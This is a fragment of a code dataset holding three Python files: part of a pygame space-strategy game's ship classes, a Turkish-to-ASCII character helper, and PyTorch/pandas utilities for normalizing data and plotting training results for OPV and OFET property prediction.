pygame.draw.aalines(self.view.screen, self.colour, True, self.offsetPoints())\n\n def drawOrders(self):\n lastx, lasty = self.x, self.y\n for order in self.orders:\n tempxy = order.xy()\n if not tempxy is False:\n pygame.draw.line(self.view.screen, order.colour, ((lastx - self.view.x) * self.view.zoom, (lasty - self.view.y) * self.view.zoom), ((tempxy[0] - self.view.x) * self.view.zoom, (tempxy[1] - self.view.y) * self.view.zoom))\n #pygame.draw.circle(screen, (20,20,20), ((order.x - view.x) * view.zoom, (order.y - view.y) * view.zoom), 2)\n lastx, lasty = tempxy[0], tempxy[1]\n \n def rotateTowardAngle(self, angle):\n if misc.positive(angle - self.rotation) < self.rotateSpeed: # If rotation speed is bigger than the amount which you need to turn\n self.rotation = angle # then only turn to face the desired angle\n else:\n if misc.normalisedAngle(angle - self.rotation) > math.pi: # If the angle which you're rotating towards is more 180 degrees to the right, it makes more sense to turn left\n self.rotation = misc.normalisedAngle(self.rotation - self.rotateSpeed) # Turn left by self.rotateSpeed\n else:\n self.rotation = misc.normalisedAngle(self.rotation + self.rotateSpeed) # Turn right by self.rotateSpeed\n self.needsToCalcPoints = True\n\n def moveForward(self): \n self.y -= math.cos(self.rotation) * self.speed\n self.x += math.sin(self.rotation) * self.speed\n self.needsToCalcPoints = True\n\n def poll(self):\n #update the ships data\n self.orders[0].poll()\n self.calcExtras()\n# self.view.lowEffects.append(effects.StaticParticle(self.view, self.x + self.radius * math.sin(self.rotation + math.pi), (self.y - self.radius * math.cos(self.rotation + math.pi)), 5))\n\n def angleToXY(self, x, y):\n #calculate the angle from the referenced ships heading to the\n #given x,y point.\n if self.y - y > 0:\n return misc.normalisedAngle(math.atan((self.x-x)/(y-self.y)))\n elif self.y - y == 0:\n return misc.normalisedAngle(-math.atan(self.x-x))\n else:\n return misc.normalisedAngle(math.atan((self.x-x)/(y-self.y))+math.pi)\n\n def distanceFrom(self, x, y):\n #Pythagoras up in this. yeah boy.\n return math.sqrt((self.x-x)**2 + (self.y-y)**2)\n\n def offsetPoints(self):\n points = []\n for point in self.points:\n points.append(((point[0] - self.view.x) * self.view.zoom, (point[1] - self.view.y) * self.view.zoom))\n return points\n\n def nextOrder(self):\n self.orders.pop(0)\n if len(self.orders) == 0:\n self.moving = False\n self.orders.append(orders.Idle(self))\n\n def queueOrder(self, order):\n if len(self.orders) > 0:\n if not isinstance(self.orders[-1], orders.Idle):\n self.orders.append(order)\n self.orders[-1].setShip(self)\n else:\n self.setOrder(order)\n else:\n self.setOrder(order)\n\n def setOrder(self, order):\n if self.built:\n self.orders = [order]\n self.orders[0].setShip(self)\n else:\n self.orders = [orders.Idle(self), order]\n self.orders[1].setShip(self)\n\n def justBuilt(self):\n self.nextOrder()\n self.built = True\n\n def select(self):\n self.view.selectedShips.append(self)\n\n def drawBounding( self ):\n #Calculate the scaled center\n xCenter = ( self.x - self.view.x ) * self.view.zoom;\n yCenter = ( self.y - self.view.y ) * self.view.zoom;\n\n #Calculate the scaled size\n zSize = ( ( self.shieldRadius ) * self.view.zoom )\n\n #Calculate the minimum x for the bounding box\n xMin = xCenter - zSize\n xMax = xCenter + zSize\n \n #Calculate the minimum y for the bounding box\n yMin = yCenter - zSize\n yMax = yCenter + zSize\n \n #Draw bounding circle\n pygame.draw.circle(self.view.screen, misc.MIDGREEN, ((self.x - self.view.x) * self.view.zoom, (self.y - self.view.y) * self.view.zoom), (self.shieldRadius + 2) * self.view.zoom, 1)\n\t\t\n \"\"\"\n #Draw bounding box of object\n \n pygame.draw.line(self.view.screen, misc.GREY, ( xMin, yMax ), ( xMax, yMax ),2 )\n pygame.draw.line(self.view.screen, misc.GREY, ( xMax, yMax ), ( xMax, yMin ),2 )\n pygame.draw.line(self.view.screen, misc.GREY, ( xMax, yMin ), ( xMin, yMin ),2 )\n pygame.draw.line(self.view.screen, misc.GREY, ( xMin, yMin ), ( xMin, yMax ),2 )\n \"\"\"\n \n # SPECIFC SHIP CLASSES START HERE ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! !\n\nclass S1s1(Ship):\n \"\"\" as of rev 12 now a list\"\"\"\n health = 10\n radius = 5\n shieldRadius = 5\n #buildInfo\n buildCost = 2\n buildTime = 400\n rotateSpeed = 0.05\n speed = 1\n canAttack = True # this ship has a weapon! useful for setting ui & making sure that ships that can't attack when selected\n # with those that can don't get an erroneus attack order.\n launchers = [] # weapon related values\n hardpoints = []\n \n def __init__(self, view, player, x, y):\n self.enginePoint = (x, y) # engine points. one needs to be initialised so it is...\n \"\"\"\n Please note that enginePoints function like hardpoints, due to the nature of the flickerCircle effect.\n Ho hum. If a ship has more than three engines i'll code it as a list. or something.\n \n On S1s1 it's calcpointed as a point nearer the rear of the ship.\n \"\"\"\n # and we create a FlickerCircle for it...\n # FlickerCircle.__init__(self, view, xyAsTuple, size, speed, colour):\n self.engineFlicker = effects.FlickerCircle(view, self.enginePoint, 2.5, 0.25, misc.WHITE)\n view.lowEffects.append(self.engineFlicker)\n # this needs to have it's xy updated in calcpoints.\n Ship.__init__(self, view, player, x, y)\n \n def calcPoints(self):\n #calculate the three points of the triangle relative to the center xy of the ship\n #and the radius given to the ship.\n \n # starboard side\n self.points = [(self.x + self.radius * math.sin(self.rotation), (self.y - self.radius * math.cos(self.rotation))),\\\n (self.x + self.radius * math.sin(self.rotation + 2.3 * math.pi / 3), (self.y - self.radius * math.cos(self.rotation + 2.3 * math.pi / 3))),\\\n (self.x + self.radius * math.sin(self.rotation + 2.7 * math.pi / 3), (self.y - self.radius * math.cos(self.rotation + 2.7 * math.pi / 3))),\\\n # these two lines are the inner dips for the engine.\n (self.x + (self.radius-3) * math.sin(self.rotation + 2.6 * math.pi / 3), (self.y - (self.radius-3) * math.cos(self.rotation + 2.6 * math.pi / 3))),\\\n (self.x + (self.radius-3) * math.sin(self.rotation + 3.4 * math.pi / 3), (self.y - (self.radius-3) * math.cos(self.rotation + 3.4 * math.pi / 3))),\\\n # port side.\n (self.x + self.radius * math.sin(self.rotation + 3.3 * math.pi / 3), (self.y - self.radius * math.cos(self.rotation + 3.3 * math.pi / 3))),\\\n (self.x + self.radius * math.sin(self.rotation + 3.7 * math.pi / 3), (self.y - self.radius * math.cos(self.rotation + 3.7 * math.pi / 3)))]\n self.needsToCalcPoints = False\n \n def calcExtras(self):\n self.hardpoints = [(self.x + (self.radius + 3) * math.sin(self.rotation), (self.y - (self.radius + 8) * math.cos(self.rotation)), self.rotation)]\n # engine point calcs. THESE NEED TO BE MOVED TO CALCPOINTS WHEN THEY'RE ONLY DRAWING WHEN ONSCREEN.\n # calculate the xy.\n self.enginePoint = ((self.x + (self.radius - 3.5) * math.sin(self.rotation + 3 * math.pi / 3)), (self.y - (self.radius - 3.5) * math.cos(self.rotation + 3 * math.pi / 3)))\n # update the xy.\n if self.moving:\n self.engineFlicker.xy = self.enginePoint\n self.engineFlicker.visible = True # this could be handled in the poll of the FlickerCircle.\n # but it would be less offscreen efficient - this only gets polled when onscreen.\n else:\n self.engineFlicker.visible = False\n i = 0\n for launcher in self.launchers:\n launcher.hardpoint = self.hardpoints[i]\n launcher.poll()\n i += 1\n \n def die(self):\n self.view.effects.append(effects.ExplosionShip(self.view, self, 10))\n self.view.effects.append(effects.Explosion(self.view, (self.x, self.y), 0.5, (self.radius * 4), misc.WHITE))\n #and remove the ship when done.\n self.remove()\n #any player related stats go here. like death count and such. Dunno if we want need these but hum.\n self.engineFlicker.die()\n\nclass S1s2(Ship):\n \"\"\" as of rev 12, now a list \"\"\"\n intEnginePoint = [2, 3]\n\n #buildInfo\n buildCost = 10\n buildTime = 10\n \n def calcPoints(self):\n self.points = [((self.x + self.radius * math.sin(self.rotation)), (self.y - self.radius * math.cos(self.rotation))),\\\n (self.x + self.radius * math.sin(self.rotation + 1.7 * math.pi / 3), (self.y - self.radius * math.cos(self.rotation + 1.7 * math.pi / 3))),\\\n (self.x + self.radius * math.sin(self.rotation + 3 * math.pi / 3), (self.y - self.radius * math.cos(self.rotation + 3 * math.pi / 3))),\\\n (self.x + self.radius * math.sin(self.rotation + 4.3 * math.pi / 3), (self.y - self.radius * math.cos(self.rotation + 4.3 * math.pi / 3)))]\n self.needsToCalcPoints = False\n \nclass S1s4(Ship):\n \"\"\" Spear class cruiser \"\"\"\n health = 50\n radius = 20\n shieldRadius = 22\n #buildInfo\n buildCost = 10\n buildTime = 1000\n rotateSpeed = 0.005\n speed = 0.2\n canAttack = True # this ship has a weapon! useful for setting ui & making sure that ships that can't attack when selected\n # with those that can don't get an erroneus attack order.\n launchers = [] # weapon related values\n hardpoints = []\n \n def __init__(self, view, player, x, y):\n self.enginePoint2 = self.enginePoint1 = (x, y) # engine points. one needs to be initialised so it is...\n \"\"\"\n Please note that enginePoints function like hardpoints, due to the nature of the flickerCircle effect.\n Ho hum. If a ship has more than three engines i'll code it as a list. or something.\n \n On S1s1 it's calcpointed as a point nearer the rear of the ship.\n \"\"\"\n # and we create a FlickerCircle for it...\n # FlickerCircle.__init__(self, view, xyAsTuple, size, speed, colour):\n self.engineFlicker1 = effects.FlickerCircle(view, self.enginePoint1, 2.5, 0.25, misc.WHITE)\n self.engineFlicker2 = effects.FlickerCircle(view, self.enginePoint2, 2.5, 0.25, misc.WHITE)\n view.lowEffects.append(self.engineFlicker1)\n view.lowEffects.append(self.engineFlicker2)\n # this needs to have it's xy updated in calcpoints.\n Ship.__init__(self, view, player, x, y)\n \n def calcPoints(self):\n # HOLY COW!\n # starboard side\n # point 0: 0, 0 for this ship. Pointy.\n self.points = [(self.x + self.radius * math.sin(self.rotation), (self.y - self.radius * math.cos(self.rotation))),\\\n # point 1: 2.28 & 9.75 15 - 9.75 = 5.25\n (self.x + (self.radius-5.25) * math.sin(self.rotation + 2.3 * math.pi / 3), (self.y - (self.radius-5.25) * math.cos(self.rotation + 2.3 * math.pi / 3))),\\\n # point 2: 2.67 @ 46 ... = 3.5\n (self.x + (self.radius-3.5) * math.sin(self.rotation + 2.67 * math.pi / 3), (self.y - (self.radius-3.5) * math.cos(self.rotation + 2.67 * math.pi / 3))),\\\n # Starboard side engine.\n # point 3: 2.6 & 17.5 ... 15 - 4.375 = 10.625 !!! minus four'd!\n (self.x + (self.radius-6.625) * math.sin(self.rotation + 2.6 * math.pi / 3), (self.y - (self.radius-6.625) * math.cos(self.rotation + 2.6 * math.pi / 3))),\\\n # point 4: 2.79 ~ 2.8 & 14.0 ... 15 - 3.5 = 11.5 !!! minus four'd\n (self.x + (self.radius-7.5) * math.sin(self.rotation + 2.8 * math.pi / 3), (self.y - (self.radius-7.5) * math.cos(self.rotation + 2.8 * math.pi / 3))),\\\n # begin tail assembly.\n # point 5: 2.87 & 49.5 ... 15 - 12.375 = 2.625\n (self.x + (self.radius-2.625) * math.sin(self.rotation + 2.87 * math.pi / 3), (self.y - (self.radius-2.625) * math.cos(self.rotation + 2.87 * math.pi / 3))),\\\n # tail point.\n # point 6: 3 & radius.\n (self.x + self.radius * math.sin(self.rotation + 3 * math.pi / 3), (self.y - self.radius * math.cos(self.rotation + 3 * math.pi / 3))),\\\n # final tail point.\n # point 7 equiv 5.\n (self.x + (self.radius-2.625) * math.sin(self.rotation + 3.13 * math.pi / 3), (self.y - (self.radius-2.625) * math.cos(self.rotation + 3.13 * math.pi / 3))),\\\n # Portside engine.\n # point 8 equiv 4. !!! minus 4'd\n (self.x + (self.radius-7.5) * math.sin(self.rotation + 3.2 * math.pi / 3), (self.y - (self.radius-7.5) * math.cos(self.rotation + 3.2 * math.pi / 3))),\\\n # point 9 equiv 3. !!! minus 4'd\n (self.x + (self.radius-6.625) * math.sin(self.rotation + 3.4 * math.pi / 3), (self.y - (self.radius-6.625) * math.cos(self.rotation + 3.4 * math.pi / 3))),\\\n # Port side.\n # point 10 equiv 2.\n (self.x + (self.radius-3.5) * math.sin(self.rotation + 3.33 * math.pi / 3), (self.y - (self.radius-3.5) * math.cos(self.rotation + 3.33 * math.pi / 3))),\\\n # point 11 equiv 1.\n (self.x + (self.radius-5.25) * math.sin(self.rotation + 3.7 * math.pi / 3), (self.y - (self.radius-5.25) * math.cos(self.rotation + 3.7 * math.pi / 3)))]\n self.needsToCalcPoints = False\n \n def calcExtras(self):\n self.hardpoints = [(self.x + (self.radius+2) * math.sin(self.rotation), (self.y - (self.radius+2) * math.cos(self.rotation)), self.rotation)]\n self.hardpoints.append((self.x + (self.radius+2) * math.sin(self.rotation + 2.3 * math.pi / 3), (self.y - (self.radius+2) * math.cos(self.rotation + 2.3 * math.pi / 3)), self.rotation + 2.3))\n self.hardpoints.append((self.x + (self.radius+2) * math.sin(self.rotation + 3.7 * math.pi / 3), (self.y - (self.radius+2) * math.cos(self.rotation + 3.7 * math.pi / 3)), self.rotation + 3.7))\n # engine point calcs. THESE NEED TO BE MOVED TO CALCPOINTS WHEN THEY'RE ONLY DRAWING WHEN ONSCREEN.\n # calculate the xy.\n self.enginePoint1 = ((self.x + (self.radius - 7) * math.sin(self.rotation + 2.7 * math.pi / 3)), (self.y - (self.radius - 7) * math.cos(self.rotation + 2.7 * math.pi / 3)))\n self.enginePoint2 = ((self.x + (self.radius - 7) * math.sin(self.rotation + 3.3 * math.pi / 3)), (self.y - (self.radius - 7) * math.cos(self.rotation + 3.3 * math.pi / 3)))\n # update the xy.\n if self.moving:\n self.engineFlicker1.xy = self.enginePoint1\n self.engineFlicker2.xy = self.enginePoint2\n self.engineFlicker1.visible = True\n self.engineFlicker2.visible = True\n else:\n self.engineFlicker1.visible = False\n self.engineFlicker2.visible = False\n i = 0\n for launcher in self.launchers:\n launcher.hardpoint = self.hardpoints[i]\n launcher.poll()\n i += 1\n \n def die(self):\n self.view.effects.append(effects.ExplosionShip(self.view, self, 10))\n self.view.effects.append(effects.Explosion(self.view, (self.x, self.y), 0.5, (self.radius * 4), misc.WHITE))\n #and remove the ship when done.\n self.remove()\n #any player related stats go here. like death count and such. Dunno if we want need these but hum.\n self.engineFlicker1.die()\n self.engineFlicker2.die()\n\n\nclass S1s6(Ship):\n \"\"\" Carrier \"\"\"\n intEnginePoint = [0, 0]\n buildPoints = [(0,0),(0,0)]\n buildQueue = []\n building = False\n buildTimeRemaining = 0\n buildShip = Ship\n\n health = 40\n\n radius = 25\n\n rotateSpeed = 0.004\n speed = 0.1\n\n #buildInfo\n buildCost = 10\n buildTime = 1000\n \n availableToBuild = [S1s1]\n \n def calcPoints(self):\n self.points = [(self.x + self.radius * math.sin(self.rotation + 5.8 * math.pi / 3), (self.y - self.radius * math.cos(self.rotation + 5.8 * math.pi /3))),\\\n (self.x + self.radius * math.sin(self.rotation + 0.2 * math.pi / 3), (self.y - self.radius * math.cos(self.rotation + 0.2 * math.pi / 3))),\\\n (self.x + self.radius * math.sin(self.rotation + 2 * math.pi / 3), (self.y - self.radius * math.cos(self.rotation + 2 * math.pi / 3))),\\\n (self.x + self.radius * math.sin(self.rotation + 2.8 * math.pi / 3), (self.y - self.radius * math.cos(self.rotation + 2.8 * math.pi / 3))),\\\n (self.x + self.radius * math.sin(self.rotation + 3.2 * math.pi / 3), (self.y - self.radius * math.cos(self.rotation + 3.2 * math.pi / 3))),\\\n (self.x + self.radius * math.sin(self.rotation + 4 * math.pi / 3), (self.y - self.radius * math.cos(self.rotation + 4 * math.pi / 3)))]\n self.needsToCalcPoints = False\n\n def calcExtras(self):\n self.buildPoints[0] = (self.x + (self.radius + 10) * math.sin(self.rotation)), (self.y - (self.radius + 10) * math.cos(self.rotation))\n\n def poll(self):\n #standard poll functions\n self.orders[0].poll()\n self.calcExtras()\n if self.building == False and len(self.buildQueue) > 0:\n self.buildShip = self.buildQueue.pop(0)\n self.buildShip.orders = [orders.Idle(self)]\n self.buildShip.rotation = self.rotation\n self.player.resources -= self.buildShip.buildCost\n self.buildTimeRemaining = self.buildShip.buildTime\n self.player.ships.append(self.buildShip) # Add to list of ships.\n# print ships\n self.building = True\n elif self.building == True:\n# print self.buildTimeRemaining\n self.buildTimeRemaining -= 1\n self.buildShip.x = self.buildPoints[0][0]\n# print self.buildShip.x\n self.buildShip.y = self.buildPoints[0][1]\n #self.buildShip.rotation = self.rotation\n self.buildShip.rotation = misc.normalisedAngle(0.02 + self.buildShip.rotation)\n self.buildShip.calcPoints()\n self.buildShip.colour = ((self.player.colour[0] * (self.buildShip.buildTime - self.buildTimeRemaining + 1) / self.buildShip.buildTime),\\\n (self.player.colour[1] * (self.buildShip.buildTime - self.buildTimeRemaining + 1) / self.buildShip.buildTime),\\\n (self.player.colour[2] * (self.buildShip.buildTime - self.buildTimeRemaining + 1) / self.buildShip.buildTime))\n #print self.buildShip.colour\n\n if self.buildTimeRemaining == 1:\n #self.buildShip.setOrder(orders.MoveToXY(10,10))\n self.buildShip.justBuilt()\n self.building = False \n\n def addToBuildQueue(self, ship): #Currently only produces triangles. only works on buildships.\n self.buildQueue.append(ship(self.view, self.player, self.buildPoints[0][0], self.buildPoints[0][1])) # Pete, you forgot the self. prefix\n","sub_path":"ships.py","file_name":"ships.py","file_ext":"py","file_size_in_byte":22205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"585835301","text":"def turkish_chars_to_ascii_chars(turkish_string):\n turkish_chars = ['ç', 'ğ', 'ı', 'ö', 'ş', 'ü']\n latin_chars = ['c', 'g', 'i', 'o', 's', 'u']\n\n cleared_str = ''\n for s in turkish_string:\n try:\n index_of_ascii_char = turkish_chars.index(s)\n cleared_str += latin_chars[index_of_ascii_char]\n except ValueError:\n # means that: it is not a special Turkish char\n cleared_str += s\n return cleared_str\n","sub_path":"horsing_around/tests/string_util.py","file_name":"string_util.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"291096265","text":"\"\"\"\nThis modules contains utility functions for data manipulation and plotting of\nresults and data\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import r2_score\nimport torch\n\n\n#######################################################\n# Data Utilities \n#######################################################\n\ndef load_trained_model(previous_model, model, optimizer):\n \n checkpoint = torch.load(previous_model)\n start_epoch = checkpoint['epoch']\n model.load_state_dict(checkpoint['state_dict'])\n optimizer.load_state_dict(checkpoint['optimizer'])\n model.eval()\n \n return model, optimizer\n\n\ndef save_trained_model(save_path, epoch, model, optimizer, train_loss, test_loss):\n save_dict = {\n 'epoch': epoch,\n 'state_dict': model.state_dict(),\n# 'train_losses': train_loss\n# 'test_losses': [pce_test_loss, voc_test_loss,\n# jsc_test_loss, ff_test_loss]\n 'optimizer': optimizer.state_dict()\n }\n \n torch.save(save_dict, save_path)\n return\n\n\ndef df_MinMax_normalize(dataframe):\n \n df = dataframe\n \n normed_df = pd.DataFrame()\n\n df_norm_key = {}\n\n for colname, coldata in df.iteritems():\n max_val = coldata.max()\n min_val = coldata.min()\n\n df_norm_key[colname] = [min_val, max_val]\n\n normed_col = (coldata - min_val) / (max_val - min_val)\n normed_df[colname] = normed_col\n \n return normed_df, df_norm_key \n\n\ndef df_MinMax_denormalize(normed_df, norm_key):\n \n denormed_df = pd.DataFrame()\n \n for colname, coldata in normed_df.iteritems():\n mn = norm_key[colname][0]\n mx = norm_key[colname][1]\n \n denormed_col = (coldata * (mx - mn)) + mn\n \n denormed_df[colname] = denormed_col\n \n return denormed_df\n\n\ndef df_Gaussian_normalize(dataframe):\n \n df = dataframe\n normed_df = pd.DataFrame()\n norm_key = {}\n \n for colname, coldata in df.iteritems():\n stdev = coldata.std()\n mean = coldata.mean()\n \n normed_col = (coldata - mean) / stdev\n normed_df[colname] = normed_col\n \n norm_key[colname] = [mean, stdev]\n \n return normed_df, norm_key\n\n\n#######################################################\n# Network Model Utilities\n#######################################################\n\ndef init_weights(model):\n if type(model) == torch.nn.Linear:\n torch.nn.init.xavier_uniform_(model.weight)\n model.bias.data.fill_(0.01)\n \n# if type(model) == nn.BatchNorm1d:\n# model.reset_parameters()\n\n \n\n#######################################################\n# Plotting Utilities\n#######################################################\n\ndef plot_OPV_df_loss(epochs, train_epoch_losses, test_epoch_losses,\n pce_train_epoch_losses, pce_test_epoch_losses,\n voc_train_epoch_losses, voc_test_epoch_losses,\n jsc_train_epoch_losses, jsc_test_epoch_losses,\n ff_train_epoch_losses, ff_test_epoch_losses):\n \n \n fig, ax = plt.subplots(figsize = (8,6))\n \n plt.plot(epochs, train_epoch_losses, c = 'k', label = 'training error')\n plt.plot(epochs, test_epoch_losses, c = 'r', label = 'testing error')\n plt.legend(loc = 'upper right')\n plt.title(\"Total Training & Testing Error\")\n ax.set_xlabel('Epoch')\n ax.set_ylabel('Total MSE Loss')\n plt.show()\n \n fig, ax = plt.subplots(figsize = (8,6))\n\n plt.plot(epochs[::], pce_train_epoch_losses[::], c = 'k', label = 'pce training')\n plt.plot(epochs[::], pce_test_epoch_losses[::], '-.', c = 'k', label = 'pce testing')\n\n plt.plot(epochs[::], voc_train_epoch_losses[::], c = 'r', label = 'voc training')\n plt.plot(epochs[::], voc_test_epoch_losses[::], '-.', c = 'r', label = 'voc testing')\n\n plt.plot(epochs[::], jsc_train_epoch_losses[::], c = 'g', label = 'jsc training')\n plt.plot(epochs[::], jsc_test_epoch_losses[::], '-.', c = 'g', label = 'jsc testing') \n \n plt.plot(epochs[::], ff_train_epoch_losses[::], c = 'b', label = 'ff training') \n plt.plot(epochs[::], ff_test_epoch_losses[::], '-.', c = 'b', label = 'ff testing') \n\n plt.legend(loc = 'upper right')\n plt.title(\"Branch Training & Testing Error\")\n ax.set_xlabel('epoch')\n ax.set_ylabel('MSE')\n plt.show()\n \n return\n\ndef plot_OPV_df_accuracies(epochs, pce_test_epoch_accuracies, voc_test_epoch_accuracies, \n jsc_test_epoch_accuracies, ff_test_epoch_accuracies):\n \n fig, ax = plt.subplots(figsize = (8,6))\n # plt.plot(epochs, train_epoch_accuracy, c = 'k', label = 'training accuracy')\n plt.plot(epochs, pce_test_epoch_accuracies, c = 'k', label = 'pce MAPE')\n plt.plot(epochs, voc_test_epoch_accuracies, c = 'r', label = 'voc MAPE')\n plt.plot(epochs, jsc_test_epoch_accuracies, c = 'g', label = 'jsc MAPE')\n plt.plot(epochs, ff_test_epoch_accuracies, c = 'b', label = 'ff MAPE')\n plt.legend(loc = 'upper right')\n plt.title(\"Branch Testing Accuracy\")\n ax.set_xlabel('Epoch')\n ax.set_ylabel('Mean Absolute Percent Error')\n plt.show()\n \n return\n\ndef plot_OPV_parity(pce_labels, PCE_out, voc_labels, Voc_out,\n jsc_labels, Jsc_out, ff_labels, FF_out):\n \n xlin = ylin = np.arange(-10, 10, 1)\n\n r2 = r2_score(pce_labels, PCE_out)\n fig, ax = plt.subplots(figsize = (8,6))\n plt.scatter(PCE_out, pce_labels)\n plt.plot(xlin, ylin, c = 'k')\n ax.annotate(f\"$R^{2}$ = {r2:.3f}\", xy = (0.2, 0.4))\n ax.set_xlim(min(pce_labels.min(), PCE_out.min()), max(pce_labels.max(), PCE_out.max()))\n ax.set_ylim(min(pce_labels.min(), PCE_out.min()), max(pce_labels.max(), PCE_out.max()))\n ax.set_xlabel(\"Predictions\")\n ax.set_ylabel(\"Ground Truth\")\n plt.title('PCE Parity')\n plt.show()\n\n r2 = r2_score(voc_labels, Voc_out)\n fig, ax = plt.subplots(figsize = (8,6))\n ax.annotate(f\"$R^{2}$ = {r2:.3f}\", xy = (0.2, 0.4))\n plt.scatter(Voc_out, voc_labels)\n plt.plot(xlin, ylin, c = 'k')\n ax.set_xlim(min(voc_labels.min(), Voc_out.min()), max(voc_labels.max(), Voc_out.max()))\n ax.set_ylim(min(voc_labels.min(), Voc_out.min()), max(voc_labels.max(), Voc_out.max()))\n ax.set_xlabel(\"Predictions\")\n ax.set_ylabel(\"Ground Truth\")\n plt.title('Voc Parity')\n plt.show()\n\n r2 = r2_score(jsc_labels, Jsc_out)\n fig, ax = plt.subplots(figsize = (8,6))\n ax.annotate(f\"$R^{2}$ = {r2:.3f}\", xy = (0.2, 0.4))\n plt.scatter(Jsc_out, jsc_labels)\n plt.plot(xlin, ylin, c = 'k')\n ax.set_xlim(min(jsc_labels.min(), Jsc_out.min()), max(jsc_labels.max(), Jsc_out.max()))\n ax.set_ylim(min(jsc_labels.min(), Jsc_out.min()), max(jsc_labels.max(), Jsc_out.max()))\n ax.set_xlabel(\"Predictions\")\n ax.set_ylabel(\"Ground Truth\")\n plt.title('Jsc Parity')\n plt.show()\n\n r2 = r2_score(ff_labels, FF_out)\n fig, ax = plt.subplots(figsize = (8,6))\n ax.annotate(f\"$R^{2}$ = {r2:.3f}\", xy = (0.2, 0.4))\n plt.scatter(FF_out, ff_labels)\n plt.plot(xlin, ylin, c = 'k')\n ax.set_xlim(min(ff_labels.min(), FF_out.min()), max(ff_labels.max(), FF_out.max()))\n ax.set_ylim(min(ff_labels.min(), FF_out.min()), max(ff_labels.max(), FF_out.max()))\n ax.set_xlabel(\"Predictions\")\n ax.set_ylabel(\"Ground Truth\")\n plt.title('FF Parity')\n plt.show()\n \n \ndef plot_OFET_df_loss(epochs, train_epoch_losses, test_epoch_losses,\n mu_train_epoch_losses, mu_test_epoch_losses,\n r_train_epoch_losses, r_test_epoch_losses,\n on_off_train_epoch_losses, on_off_test_epoch_losses,\n vt_train_epoch_losses, vt_test_epoch_losses):\n \n \n fig, ax = plt.subplots(figsize = (8,6))\n \n plt.plot(epochs[::], train_epoch_losses[::], c = 'k', label = 'training error')\n plt.plot(epochs[::], test_epoch_losses[::], c = 'r', label = 'testing error')\n plt.legend(loc = 'upper right')\n plt.title(\"Total Training & Testing Error\")\n ax.set_xlabel('Epoch')\n ax.set_ylabel('Total MSE Loss')\n plt.show()\n \n fig, ax = plt.subplots(figsize = (8,6))\n\n plt.plot(epochs[::], mu_train_epoch_losses[::], c = 'k', label = 'mu training')\n plt.plot(epochs[::], mu_test_epoch_losses[::], '-.', c = 'k', label = 'mu testing')\n\n plt.plot(epochs[::], r_train_epoch_losses[::], c = 'r', label = 'r training')\n plt.plot(epochs[::], r_test_epoch_losses[::], '-.', c = 'r', label = 'r testing')\n\n plt.plot(epochs[::], on_off_train_epoch_losses[::], c = 'g', label = 'on_off training')\n plt.plot(epochs[::], on_off_test_epoch_losses[::], '-.', c = 'g', label = 'on_off testing') \n \n plt.plot(epochs[::], vt_train_epoch_losses[::], c = 'b', label = 'vt training') \n plt.plot(epochs[::], vt_test_epoch_losses[::], '-.', c = 'b', label = 'vt testing') \n\n plt.legend(loc = 'upper right')\n plt.title(\"Branch Training & Testing Error\")\n ax.set_xlabel('epoch')\n ax.set_ylabel('MSE')\n plt.show()\n \n return\n\n\ndef plot_OFET_df_accuracies(epochs, mu_test_epoch_accuracies, r_test_epoch_accuracies, \n on_off_test_epoch_accuracies, vt_test_epoch_accuracies):\n \n fig, ax = plt.subplots(figsize = (8,6))\n # plt.plot(epochs, train_epoch_accuracy, c = 'k', label = 'training accuracy')\n plt.plot(epochs, mu_test_epoch_accuracies, c = 'k', label = 'mu MAPE')\n plt.plot(epochs, r_test_epoch_accuracies, c = 'r', label = 'r MAPE')\n plt.plot(epochs, on_off_test_epoch_accuracies, c = 'g', label = 'on_off MAPE')\n plt.plot(epochs, vt_test_epoch_accuracies, c = 'b', label = 'vt MAPE')\n plt.legend(loc = 'upper right')\n plt.title(\"Branch Testing Accuracy\")\n ax.set_xlabel('Epoch')\n ax.set_ylabel('Mean Absolute Percent Error')\n plt.show()\n \n return\n\n\ndef plot_OFET_parity(mu_labels, mu_out, r_labels, r_out,\n on_off_labels, on_off_out, vt_labels, vt_out):\n \n xlin = ylin = np.arange(-20, 20, 1)\n\n r2 = r2_score(mu_labels, mu_out)\n fig, ax = plt.subplots(figsize = (8,6))\n plt.scatter(mu_labels, mu_out)\n plt.plot(xlin, ylin, c = 'k')\n ax.annotate(f\"$R^{2}$ = {r2:.3f}\", xy = (0.2, 0.4))\n ax.set_xlim(-5, 5)\n ax.set_ylim(-5, 5)\n ax.set_ylabel(\"Predictions\")\n ax.set_xlabel(\"Ground Truth\")\n plt.title('mu Parity')\n plt.show()\n\n r2 = r2_score(r_labels, r_out)\n fig, ax = plt.subplots(figsize = (8,6))\n ax.annotate(f\"$R^{2}$ = {r2:.3f}\", xy = (0.2, 0.4))\n plt.scatter(r_labels, r_out)\n plt.plot(xlin, ylin, c = 'k')\n ax.set_xlim(-5, 5)\n ax.set_ylim(-5, 5)\n ax.set_ylabel(\"Predictions\")\n ax.set_xlabel(\"Ground Truth\")\n plt.title('r Parity')\n plt.show()\n\n r2 = r2_score(on_off_labels, on_off_out)\n fig, ax = plt.subplots(figsize = (8,6))\n ax.annotate(f\"$R^{2}$ = {r2:.3f}\", xy = (0.2, 0.4))\n plt.scatter(on_off_labels, on_off_out)\n plt.plot(xlin, ylin, c = 'k')\n ax.set_xlim(-5, 5)\n ax.set_ylim(-5, 5)\n ax.set_ylabel(\"Predictions\")\n ax.set_xlabel(\"Ground Truth\")\n plt.title('on_off Parity')\n plt.show()\n\n r2 = r2_score(vt_labels, vt_out)\n fig, ax = plt.subplots(figsize = (8,6))\n ax.annotate(f\"$R^{2}$ = {r2:.3f}\", xy = (0.2, 0.4))\n plt.scatter(vt_labels, vt_out)\n plt.plot(xlin, ylin, c = 'k')\n ax.set_xlim(-5, 5)\n ax.set_ylim(-5, 5)\n ax.set_ylabel(\"Predictions\")\n ax.set_xlabel(\"Ground Truth\")\n plt.title('Vt Parity')\n plt.show()","sub_path":"m2py/networks/network_utils.py","file_name":"network_utils.py","file_ext":"py","file_size_in_byte":11565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
